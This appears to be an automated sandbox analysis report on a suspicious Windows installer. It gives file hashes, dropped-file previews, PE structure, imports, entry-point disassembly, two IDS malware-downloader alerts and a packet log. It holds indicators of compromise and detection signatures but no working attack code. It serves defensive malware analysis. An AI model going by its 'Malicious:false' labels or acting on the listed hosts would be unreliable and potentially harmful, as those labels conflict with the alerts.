                                                                                SSDEEP:768:Y3BEzLhyMSuCE5OTO/R+5oEdZ0/EqdZceab:Y2xyM4EfYokZ0pTcTb
                                                                                MD5:7395345F8F9FA1C2C012F30387FBE6BC
                                                                                SHA1:E2ECA72547487EBC02E2C37A3B997E3B6C318F0E
                                                                                SHA-256:FE0871EB8DC89CEAACDEA8439DED372446CC9B7A5C8E4B25530DA1B9F69B6E83
                                                                                SHA-512:F4760E97752416734AA323722FFF672D85FD23E057D70296DE304CCFD7C813AAE1E2091006F1ACC9758A16ACFF8B61C00164AEE116AE9AC2FAAEC34E186DB7A1
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..)...I.....N.u.Tv'm..S..|m4(.}.nh\.LDr...g....z..rj.O.&}j....y.S..n.......(4..P.*..J.P.)Ka.r.#.....uQF'5m....[(8.MU.qV..)...*.....Er?uS ..Gp?w@..Tuq....>.}..-XgM..I..t@...O#.IRh7...J\R.. zTL*cQ7Z....ZAVd...Q%9*..c.\....%..!.....>@.....V....*_.8.db.iM4...v.i.e...V...k..sZ#)...h.\T6.)VH..eGa.*M..D:T..i..ZHF..b.e...4...b.(..9.4.O.sI.....(.......Sq@..SH..i.f(
                                                                                Process:C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):317679
                                                                                Entropy (8bit):1.2663999773114714
                                                                                Encrypted:false
                                                                                SSDEEP:1536:+C6MIq7nr4cwrdrXpUMOn0mJk0qsrHSJ+crTe:5NLLdCjsfKArHSJBe
                                                                                MD5:4B4E2FDEFF2DC5AF4E442DB8042A4ECA
                                                                                SHA1:11B4AE1475CA6474615B2FBE921C8DE02202D0A7
                                                                                SHA-256:C2BB0DD5C0CF12B535B2EB67D6DF11E6542C8B9A28C47996AD5A955EDD5F6FC7
                                                                                SHA-512:7F327729126D6A31FC6458540A4BB799FC3E5EA000DF5994FDDD6E16702C80130D472EF215E87279470DD014E0A4FB3BFC47A7A092BA37B6A484EDEDF8ECE32A
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:............................&............U...........d.........n......................................................................N.................................A...............................................................................1....................t....................m.............................r.............w....................................Q........................................................................................................................................................B..............&.....................................R........(........................................................#...................I.................>......8..,..........................................................................................-..........................'........................................................U..d...........B..P...............................9..................................................................../..............
                                                                                Process:C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 678x243, components 3
                                                                                Category:dropped
                                                                                Size (bytes):24425
                                                                                Entropy (8bit):7.966022811010688
                                                                                Encrypted:false
                                                                                SSDEEP:384:hejmQNhLRG3tOg2Q2FewajHVoWrO/zQQ1SHTpKLZTuNtTpb9PzWzpl4kO/uzvl:heJNGpKajHVDO/zQk1TuFb9PkO/ubl
                                                                                MD5:50C4365542D93FD8A313440ADDA9017D
                                                                                SHA1:DEF4FD0B74AA6D981AA001BDEA66125BCDD94235
                                                                                SHA-256:461AD2638A4BD638EC62FE4D1E467B80A2FD0C9888D99C853D196FB693D98866
                                                                                SHA-512:7CC979865AAC0E3B4562C55B30A3D868306E3D792F94DA62876673CD6E4B08752953BB45ECB2C57A23645CFE894C3D2116CA9FB97F9E61B51B76D911786C4DFB
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......s0.z......h.kn..,z..+..gr..WY..fW.v...Vn.E.z......X].`.......9L.F.O..'l.......q<..\.I.b\`..#..:sY.8Kd$J.;.9.a^._..>..t6a6..xu..i%..<AS=s^.......>h.Gz"...:.*!<dd0".n.^...$...OR*....5e...,..j[.4o.b.B.8P;...k...B...}.O..SD.......Ed..=G..!#".[h..p+..D.........h,O+.^1X......V..m....0..sP.0o..BFj.._qWnY..i..{S...7E..<.['5z4@y..%+..k..t..NMt.%.,...Y.?...
                                                                                Process:C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 650x540, components 3
                                                                                Category:dropped
                                                                                Size (bytes):33077
                                                                                Entropy (8bit):7.9576023926668045
                                                                                Encrypted:false
                                                                                SSDEEP:768:Y3BEzLhyMSuCE5OTO/R+5oEdZ0/EqdZceam:Y2xyM4EfYokZ0pTcTm
                                                                                MD5:422D904C045D4AC8205AE56D0D413CF9
                                                                                SHA1:8EDD159E33B5FEED673EB21561923B6311952D6A
                                                                                SHA-256:896685BAA3D8B6C65622F6D6241A3C2121A1E26434875E8F03C544EBE54AF56D
                                                                                SHA-512:087B0A02B40ACA8792B2E60280B8E7645E086AC19919C55F078530EEACAC6AA44FC12E5104C1D7EA25A2B2367E4721BB9CB20DE6E65D98756AC8C5395D8ED4E1
                                                                                Malicious:false
                                                                                Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..)...I.....N.u.Tv'm..S..|m4(.}.nh\.LDr...g....z..rj.O.&}j....y.S..n.......(4..P.*..J.P.)Ka.r.#.....uQF'5m....[(8.MU.qV..)...*.....Er?uS ..Gp?w@..Tuq....>.}..-XgM..I..t@...O#.IRh7...J\R.. zTL*cQ7Z....ZAVd...Q%9*..c.\....%..!.....>@.....V....*_.8.db.iM4...v.i.e...V...k..sZ#)...h.\T6.)VH..eGa.*M..D:T..i..ZHF..b.e...4...b.(..9.4.O.sI.....(.......Sq@..SH..i.f(
                                                                                Process:C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):490637
                                                                                Entropy (8bit):1.247791588729088
                                                                                Encrypted:false
                                                                                SSDEEP:1536:Iwj7QkU4Succftrx4E1tOkzEF62k8SPnkxFDhTB7FTIo:IIQkHCcfkCxYFLk8S6FBxJ
                                                                                MD5:454BFA40F950359C0C5FEDFCE885DB5D
                                                                                SHA1:3FCD8AE2AFC5D784A1759315B9E1744E9873E950
                                                                                SHA-256:92CB9A933F564E207A2F8A9387DC6F4852A5AA53AC6C95120FE77D3B684CA3A4
                                                                                SHA-512:4A8B956FBF7072B676F6A8526D6F909A7D6F43C4F67C7AEA12E275799B42B78E8500A7CAA5387EFF5607D90D578210C6FC230238B6B95401392115A0AA49DBEA
                                                                                Malicious:false
                                                                                Preview:..................................................................FA.....!.....................Y...........................................................................................................$.V.............................G...............................................................................................................@...........................................>...................................A............................................(.........................x..........................................r.............................K......................7...................................z..............L...................................^...................................................=.................................................................................................8...W...............{........................................................................................................Lf.........3...........\...................
                                                                                Process:C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):95158
                                                                                Entropy (8bit):1.2550487729623385
                                                                                Encrypted:false
                                                                                SSDEEP:768:RtbjIxO6JaLTYpLJL8Ku9ytaVXzM3gdDENCc2wqlx9:z6gLTIgt9Krox9
                                                                                MD5:4E17CFAE8BE669DC88BB9343F971862B
                                                                                SHA1:642EA7D1C06F438146D2DF1B132AC7E85A261917
                                                                                SHA-256:25615665769858EFD92342269955C6ACD095520D8FE5B5FB1633D28ED92CD840
                                                                                SHA-512:7209C60BD74062F9E689A8389F671C0E0B531B764858957C5724AE548E28A163809B5A7B998D680250AFD84D1BC28414EAD65D12D8D352CF4D4B0E9E4BAC2237
                                                                                Malicious:false
                                                                                Preview:.,...........................,.....................................................R...................................x.............................|............................................................B................................................................Y..................U...........................t............2...................L..]................................................R...............................l..................................................................................R...............)......D.......T................................t.X7...............O...............................................................5..............p..............8....l!...........................................5.....................................................".......................................................................L..............................................q......q......................................................................
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                Entropy (8bit):6.621271816812706
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:1258ad6Jpw.exe
                                                                                File size:1'113'012 bytes
                                                                                MD5:8b0bd4c6a70334229181f7f0563e154b
                                                                                SHA1:cb0adf2e607fd383b5f1f2e298b0aee721d5716f
                                                                                SHA256:d953e4ecdd89c5bec7fa20b1d7f43ad83940c3505b9deaaf8dd79247d4178852
                                                                                SHA512:3ed928d686dd3f565152d9da88a3d67990bec27c37e9d523a904b2ca7014d2783e690a3754e5674eff59c183454b180b3a3312b251d62ef455065cdba58ae2e1
                                                                                SSDEEP:24576:LzOEC045qGBczSaixgooBOkclvNG5HgapE:eEe0UIixgoUOkc6NgV
                                                                                TLSH:E5351287FA7445E7F8384231A82ADD781E31BC2A340C5A4AB2F7B79F6C337406649536
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...<.MX.................b...|.....
                                                                                Icon Hash:07970e4547277670
                                                                                Entrypoint:0x4031a3
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x584DCA3C [Sun Dec 11 21:50:52 2016 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                                Instruction
                                                                                sub esp, 00000184h
                                                                                push ebx
                                                                                push esi
                                                                                push edi
                                                                                xor ebx, ebx
                                                                                push 00008001h
                                                                                mov dword ptr [esp+18h], ebx
                                                                                mov dword ptr [esp+10h], 0040A198h
                                                                                mov dword ptr [esp+20h], ebx
                                                                                mov byte ptr [esp+14h], 00000020h
                                                                                call dword ptr [004080A8h]
                                                                                call dword ptr [004080A4h]
                                                                                cmp ax, 00000006h
                                                                                je 00007F4CC8D88893h
                                                                                push ebx
                                                                                call 00007F4CC8D8B801h
                                                                                cmp eax, ebx
                                                                                je 00007F4CC8D88889h
                                                                                push 00000C00h
                                                                                call eax
                                                                                mov esi, 00408298h
                                                                                push esi
                                                                                call 00007F4CC8D8B77Dh
                                                                                push esi
                                                                                call dword ptr [004080A0h]
                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                cmp byte ptr [esi], bl
                                                                                jne 00007F4CC8D8886Dh
                                                                                push ebp
                                                                                push 00000009h
                                                                                call 00007F4CC8D8B7D4h
                                                                                push 00000007h
                                                                                call 00007F4CC8D8B7CDh
                                                                                mov dword ptr [0042F404h], eax
                                                                                call dword ptr [00408044h]
                                                                                push ebx
                                                                                call dword ptr [00408288h]
                                                                                mov dword ptr [0042F4B8h], eax
                                                                                push ebx
                                                                                lea eax, dword ptr [esp+38h]
                                                                                push 00000160h
                                                                                push eax
                                                                                push ebx
                                                                                push 00429828h
                                                                                call dword ptr [00408174h]
                                                                                push 0040A188h
                                                                                push 0042EC00h
                                                                                call 00007F4CC8D8B3F7h
                                                                                call dword ptr [0040809Ch]
                                                                                mov ebp, 00435000h
                                                                                push eax
                                                                                push ebp
                                                                                call 00007F4CC8D8B3E5h
                                                                                push ebx
                                                                                call dword ptr [00408154h]
                                                                                Programming Language:
                                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85340xa0.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x6edf8.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x60710x620086ec2a2da0012903b23e33f511180572False0.6687659438775511data6.434342820031866IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x80000x13520x1400cd090b7c5bd9ae3da2a43d4f02ef98b7False0.4599609375data5.237297010093776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0xa0000x254f80x600e98382d1559cdefaafaf45200fe1faf0False0.4544270833333333data4.037252180314336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .ndata0x300000x160000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0x460000x6edf80x6ee002bdfae43485366cb4915bf38e81a67eaFalse0.28867715966741825data3.520926376921896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_BITMAP0x464300x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                RT_ICON0x467980x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144EnglishUnited States0.19849764772021186
                                                                                RT_ICON0x887c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.23927895421743758
                                                                                RT_ICON0x98fe80x96fePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9903502871630362
                                                                                RT_ICON0xa26e80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.2592495270128232
                                                                                RT_ICON0xabb900x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.2900330656589514
                                                                                RT_ICON0xafdb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.30632780082987554
                                                                                RT_ICON0xb23600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.35553470919324576
                                                                                RT_ICON0xb34080x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.40737704918032785
                                                                                RT_ICON0xb3d900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.44680851063829785
                                                                                RT_DIALOG0xb41f80x144dataEnglishUnited States0.5216049382716049
                                                                                RT_DIALOG0xb43400x13cdataEnglishUnited States0.5506329113924051
                                                                                RT_DIALOG0xb44800x100dataEnglishUnited States0.5234375
                                                                                RT_DIALOG0xb45800x11cdataEnglishUnited States0.6091549295774648
                                                                                RT_DIALOG0xb46a00xc4dataEnglishUnited States0.5918367346938775
                                                                                RT_DIALOG0xb47680x60dataEnglishUnited States0.7291666666666666
                                                                                RT_GROUP_ICON0xb47c80x84dataEnglishUnited States0.7045454545454546
                                                                                RT_VERSION0xb48500x264dataEnglishUnited States0.47058823529411764
                                                                                RT_MANIFEST0xb4ab80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                DLLImport
                                                                                KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                DescriptionData
                                                                                Commentssecondment monkshoods noeolles
                                                                                CompanyNametubehearted torchlights
                                                                                InternalNamebaggrundsmaterialet encroachment.exe
                                                                                OriginalFilenamebaggrundsmaterialet encroachment.exe
                                                                                Translation0x0409 0x04e4
                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2025-03-07T22:44:06.947274+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849689142.250.184.238443TCP
                                                                                2025-03-07T22:44:13.116704+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849691158.101.44.24280TCP
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Mar 7, 2025 22:44:04.566147089 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:04.566191912 CET44349689142.250.184.238192.168.2.8
                                                                                Mar 7, 2025 22:44:04.566261053 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:04.573894024 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:04.573908091 CET44349689142.250.184.238192.168.2.8
                                                                                Mar 7, 2025 22:44:06.300354958 CET44349689142.250.184.238192.168.2.8
                                                                                Mar 7, 2025 22:44:06.300537109 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:06.301140070 CET44349689142.250.184.238192.168.2.8
                                                                                Mar 7, 2025 22:44:06.301208019 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:06.361663103 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:06.361700058 CET44349689142.250.184.238192.168.2.8
                                                                                Mar 7, 2025 22:44:06.362065077 CET44349689142.250.184.238192.168.2.8
                                                                                Mar 7, 2025 22:44:06.362126112 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:06.365973949 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:06.408334970 CET44349689142.250.184.238192.168.2.8
                                                                                Mar 7, 2025 22:44:06.947259903 CET44349689142.250.184.238192.168.2.8
                                                                                Mar 7, 2025 22:44:06.947407007 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:06.947438955 CET44349689142.250.184.238192.168.2.8
                                                                                Mar 7, 2025 22:44:06.947491884 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:06.949279070 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:06.949347019 CET44349689142.250.184.238192.168.2.8
                                                                                Mar 7, 2025 22:44:06.949465990 CET49689443192.168.2.8142.250.184.238
                                                                                Mar 7, 2025 22:44:06.978539944 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:06.978581905 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:06.978648901 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:06.978951931 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:06.978962898 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:08.775430918 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:08.775602102 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:08.780064106 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:08.780075073 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:08.780368090 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:08.780441046 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:08.780873060 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:08.824331999 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.633253098 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.633373022 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.640095949 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.640207052 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.653686047 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.653767109 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.653793097 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.653832912 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.717633009 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.717794895 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.734308004 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.734406948 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.734431028 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.734473944 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.737482071 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.737555981 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.737624884 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.737674952 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.744966984 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.745063066 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.745081902 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.745126963 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.752950907 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.753065109 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.753092051 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.753139019 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.761257887 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.761332035 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.761356115 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.761404991 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.768687963 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.768893003 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.768898964 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.768944979 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.776797056 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.776870012 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.776913881 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.777120113 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.784274101 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.784338951 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.784348011 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.784389019 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.792125940 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.792201042 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.792222977 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.792268038 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.800277948 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.800368071 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.800391912 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.800450087 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.808751106 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.808815002 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.808840036 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.808897018 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.841448069 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.841528893 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.841553926 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.841604948 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.844443083 CET44349690142.250.185.97192.168.2.8
                                                                                Mar 7, 2025 22:44:11.844528913 CET49690443192.168.2.8142.250.185.97
                                                                                Mar 7, 2025 22:44:11.844559908 CET44349690142.250.185.97192.168.2.8
